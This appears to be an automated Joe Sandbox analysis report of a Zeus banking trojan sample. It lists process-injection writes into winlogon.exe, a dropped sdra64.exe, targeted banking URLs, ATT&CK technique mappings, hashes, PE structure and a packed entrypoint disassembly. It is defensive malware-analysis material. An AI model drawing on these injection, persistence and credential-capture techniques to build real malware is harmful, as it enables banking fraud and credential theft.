Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D500000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D501000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D514000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D516000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D518000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D520000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D521000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D534000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D536000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D538000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D540000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D541000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D554000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D556000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D558000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D560000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D561000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D574000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D576000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D578000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D580000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D581000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D594000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D596000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: D598000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00412BFD InitializeSecurityDescriptor,SetSecurityDescriptorDacl,0_2_00412BFD
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Progman
Source: glGb1KYfX6.exe, 00000000.00000002.459336076.0000000000CA0000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000002.485332816.000002388D3F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040A8E2 RtlAllocateHeap,CreateNamedPipeW,CreateEventW,CreateEventW,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,0_2_0040A8E2
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040F233 GetSystemTime,SystemTimeToFileTime,__aulldiv,0_2_0040F233
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040AC42 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW,0_2_0040AC42
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_0040F272 GetTimeZoneInformation,0_2_0040F272
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00412CCE GetTickCount,GetVersionExW,GetUserDefaultUILanguage,GetModuleFileNameW,0_2_00412CCE
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_004106C8 socket,bind,listen,closesocket,0_2_004106C8
Source: C:\Users\user\Desktop\glGb1KYfX6.exeCode function: 0_2_00410986 socket,bind,closesocket,0_2_00410986

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1Valid Accounts1Valid Accounts1Masquerading2Input Capture11System Time Discovery2Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Access Token Manipulation11Valid Accounts1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Application Shimming1Process Injection42Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Access Token Manipulation11NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptApplication Shimming1Process Injection42LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsInstall Root Certificate1DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemSystem Information Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
glGb1KYfX6.exe88%VirustotalBrowse
glGb1KYfX6.exe91%ReversingLabsWin32.Trojan.Zeus
glGb1KYfX6.exe100%AviraTR/ATRAPS.Gen2
glGb1KYfX6.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\sdra64.exe100%AviraTR/ATRAPS.Gen2
C:\Windows\SysWOW64\sdra64.exe100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.winlogon.exe.111a0000.580.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d6a0000.108.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d1a0000.68.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10c20000.536.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d8a0000.124.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11360000.594.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa60000.394.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10760000.498.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d740000.113.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f440000.345.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10fc0000.565.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d1c0000.69.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10800000.503.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eaa0000.268.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e060000.186.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fae0000.398.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.100c0000.445.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dfa0000.180.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f260000.330.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11180000.579.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e5e0000.230.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e480000.219.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa40000.393.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11060000.570.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dfe0000.182.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fa80000.395.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.106c0000.493.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e660000.234.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e7c0000.245.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11220000.584.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ed20000.288.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f920000.384.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10de0000.550.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fd20000.416.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ebe0000.278.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d5a0000.100.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fb80000.403.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11080000.571.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efa0000.308.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d2e0000.78.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f420000.344.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f540000.353.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f580000.355.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e7e0000.246.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.c960000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e360000.210.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d960000.130.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10160000.450.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e6e0000.238.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10da0000.548.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f9e0000.390.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f9a0000.388.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.db00000.143.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10c00000.535.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.eac0000.269.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f20000.560.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10e60000.554.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cfe0000.54.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ce40000.41.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10620000.488.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d040000.57.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e9a0000.260.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f60000.562.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11140000.577.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10960000.514.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca00000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.0.glGb1KYfX6.exe.400000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
2.2.winlogon.exe.102c0000.461.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d880000.123.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cbc0000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10720000.496.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d7a0000.116.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.df20000.176.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efe0000.310.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10680000.491.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f1a0000.324.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f960000.386.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.103e0000.470.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ea40000.265.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cc80000.27.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f720000.368.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.dc40000.153.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cf60000.50.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f80000.563.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10aa0000.524.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10280000.459.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ec40000.281.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cea0000.44.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f2e0000.334.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e880000.251.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e3a0000.212.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11380000.595.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca60000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10c80000.539.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10300000.463.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.fbe0000.406.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f940000.385.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.f240000.329.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.108e0000.510.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://bc.nsk.0%Avira URL Cloudsafe
https://onlineeast#.bankofamerica.com/cgi-bin/ias/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://www.faktura.ru/enter.jsp?site=glGb1KYfX6.exe, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmpfalse
    		high
    https://bc.nsk.winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://www.faktura.ru/enter.jsp?site=%SglGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmp, winlogon.exe, 00000002.00000002.465403884.000000000D741000.00000040.00000001.sdmpfalse
      		high
      https://onlineeast#.bankofamerica.com/cgi-bin/ias/glGb1KYfX6.exe, 00000000.00000002.459555222.00000000023A3000.00000004.00000040.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:368363
      Start date:14.03.2021
      Start time:03:02:11
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 23s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:glGb1KYfX6 (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:22
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.evad.winEXE@1/2@0/0
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 95.4% (good quality ratio 90.2%)
      • Quality average: 83.3%
      • Quality standard deviation: 27.6%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtWriteVirtualMemory calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Windows\SysWOW64\sdra64.exe
      Process:C:\Users\user\Desktop\glGb1KYfX6.exe
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:modified
      Size (bytes):529408
      Entropy (8bit):7.446899077949846
      Encrypted:false
      SSDEEP:12288:/1ekq9qv+41dEAMY535cZoBg0r20v4YkA3ieEMLnZg:/ckAmaAF32f0r2w4kLLG
      MD5:F4B5E29A4AB7133AA34463A01F313CC0
      SHA1:9AEBA004BA54F3800FD95C97B6E2FBF774E881B2
      SHA-256:3DB80A4033B4F71879C44264AE29444400FC94C902BFE706870218425BB0F13F
      SHA-512:4FC0730662207D94376FA7A5CF4A4DF15C887E3754929EA9C6B1020A10DF21EB8670C1F89C399CBAC7B694745BF16A0B1BBD222F10A9B447FC4923C0C3BC9968
      Malicious:true
      Antivirus:
      • Antivirus: Avira, Detection: 100%
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:low
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q>.V._..._..._.....~_...\..._......._..8.G.^_...q..._...X_.5_..P.>.._..Rich._..................PE..L...g..G.....................D...............0....@..........................................................................:..x....................................................................................0..@............................text............................... ..`.rdata...A...0...B..................@..@.data...F............\..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Windows\SysWOW64\sdra64.exe:Zone.Identifier
      Process:C:\Users\user\Desktop\glGb1KYfX6.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):26
      Entropy (8bit):3.95006375643621
      Encrypted:false
      SSDEEP:3:ggPYV:rPYV
      MD5:187F488E27DB4AF347237FE461A079AD
      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
      Malicious:true
      Reputation:high, very likely benign file
      Preview: [ZoneTransfer]....ZoneId=0

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.854645796088476
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:glGb1KYfX6.exe
      File size:89600
      MD5:8944bc22235936b73bdf874bfa4d1a64
      SHA1:6f48fb18ffd6497fbdc951b4d96340e878921d91
      SHA256:d1bf7ec60bcb74dd395f92a1ddb5a2a66e9913514e0f7428681e9a8d7fe25b1e
      SHA512:e3d637bdb3d5c4fda8a34eb3f47bdee837c514c5481067cf8c20a523430ca2b5bcd8ea20c5c79d7ea3c627b214cf89dc59c96c6d1a3983f6c77a489c489de9c2
      SSDEEP:1536:lTSvBFUz/BK0IUzdpQJ4anbsbeoXBbvLRb0JJlBQx7IlPuo/SfDEhxDEhv+143xo:lCF0K0IipQJzbsttLRbKJXQx7OuoafD2
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q>.V._..._..._......~_...\..._......._..8.G.^_...q..._...X_.5_..P.>.._..Rich._..................PE..L...g..G...................

      File Icon

      Icon Hash:00828e8e8686b000

      Static PE Info

      General

      Entrypoint:0x40aba8
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
      Time Stamp:0x471C8667 [Mon Oct 22 11:15:51 2007 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:4c317a879868b941a965444eede73069

      Entrypoint Preview

      Instruction
      call dword ptr [00413154h]
      cmp eax, 00000000h
      jne 00007F474527B25Bh
      push eax
      mov eax, esp
      push eax
      push 000000FBh
      push eax
      push eax
      call dword ptr [00413840h]
      push ebx
      mov ebx, eax
      call 00007F474527B246h
      ret
      mov eax, 00011E13h
      sub eax, 000D4A19h
      add eax, 000D4BA3h
      mov ecx, edx
      sub esp, 04h
      mov dword ptr [esp], ecx
      sub esp, 04h
      mov dword ptr [esp], 00000040h
      push 00003000h
      push eax
      sub esp, 04h
      mov dword ptr [esp], 00000000h
      call dword ptr [00413814h]
      mov ecx, dword ptr [esp]
      add esp, 04h
      mov ecx, esi
      mov esi, dword ptr [esp]
      add esi, 000000B4h
      mov edi, eax
      mov ecx, 000001E3h
      push eax
      mov edx, 0470E26Dh
      add dl, bl
      xor ebp, ebp
      sub esp, 04h
      mov dword ptr [esp], edx
      push edx
      mov bh, byte ptr [esi]
      add bh, byte ptr [esp+04h]
      add byte ptr [edi], bh
      pop edx
      pop edx
      inc esi
      sub edi, 0001A485h
      add edi, 0001A486h
      xor eax, eax
      sub eax, 000758B9h
      add eax, 000758BDh
      inc ebp
      shr edx, 08h
      cmp eax, ebp
      jne 00007F474527B24Eh
      mov ebp, 0470E26Dh
      mov edx, ebp
      mov ebp, 00000000h
      add dl, bl
      sub ecx, 000A10FDh
      add ecx, 000010FCh

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x13a000x78.rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x130000x940.rdata
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x1141e0x11600False0.838621290468data6.93746073005IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .rdata0x130000x41900x4200False0.407788825758COM executable for DOS5.58195571948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data0x180000x1460x200False0.3046875data2.0215018045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

      Imports

      DLLImport
      USER32.dllIsCharAlphaA, BringWindowToTop, CopyAcceleratorTableA, DdeKeepStringHandle, FindWindowExA, InsertMenuW, LookupIconIdFromDirectoryEx, IsWindowEnabled, EnumPropsExW, SetSysColors, GetClassInfoExA, SendMessageTimeoutA, DrawCaption, GetMonitorInfoA, CreatePopupMenu, SetMenuItemInfoA, EnumWindowStationsW, ToUnicode, SubtractRect, ChangeDisplaySettingsA, SetScrollRange, SetDlgItemInt, DestroyMenu, CreateIconFromResourceEx, IsDialogMessage, GetWindowRgn, RealGetWindowClass, CreateDialogIndirectParamA, SetWindowTextW, CallWindowProcW, HideCaret, SetPropW, CharUpperW, LoadBitmapA, SetWindowLongW, GetSystemMetrics, CallNextHookEx, SetForegroundWindow, LoadMenuW, CharToOemBuffA, IsDialogMessageA, TabbedTextOutA, DdeCreateStringHandleA, ValidateRect, EnumDesktopsA, CreateAcceleratorTableW, DialogBoxIndirectParamA, GetUpdateRect, GetMenuItemID, GetWindowInfo, MapVirtualKeyExA, DdeQueryStringW, FrameRect, EnumDisplaySettingsExA, ToUnicodeEx, SendMessageW, IsZoomed, GetScrollRange, SetPropA, IsCharAlphaW, GetWindowModuleFileNameA, WaitForInputIdle, CopyAcceleratorTableW, IsCharUpperA, MonitorFromWindow, GetClassInfoExW, IsRectEmpty, TrackPopupMenuEx, CreateIconIndirect, SetWindowTextA, SetRectEmpty, DlgDirListW, TrackMouseEvent, GetMenuItemInfoA, DrawFrameControl, CloseDesktop, GetWindowThreadProcessId, SetScrollInfo, DrawFrame, GetMessageA, AttachThreadInput, InsertMenuItemW, GetFocus, ChangeDisplaySettingsExA, ScrollWindow, SwitchDesktop, GetClassLongW, MonitorFromRect, SetKeyboardState, TranslateAcceleratorA, PostThreadMessageA, AppendMenuA, DrawIconEx, GetWindowContextHelpId, CharToOemW, ChangeMenuW, DlgDirSelectExW, LoadImageW, MsgWaitForMultipleObjects, 